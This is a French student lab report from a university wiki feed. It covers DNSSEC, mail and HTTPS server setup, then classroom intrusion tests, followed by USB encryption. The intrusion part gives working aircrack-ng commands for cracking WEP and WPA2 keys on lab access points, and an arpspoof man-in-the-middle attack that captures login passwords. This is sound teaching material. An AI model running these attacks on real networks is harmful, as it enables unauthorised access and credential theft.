pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54013</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54013"/>
				<updated>2020-11-27T17:07:45Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Installation des systèmes d’exploitation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
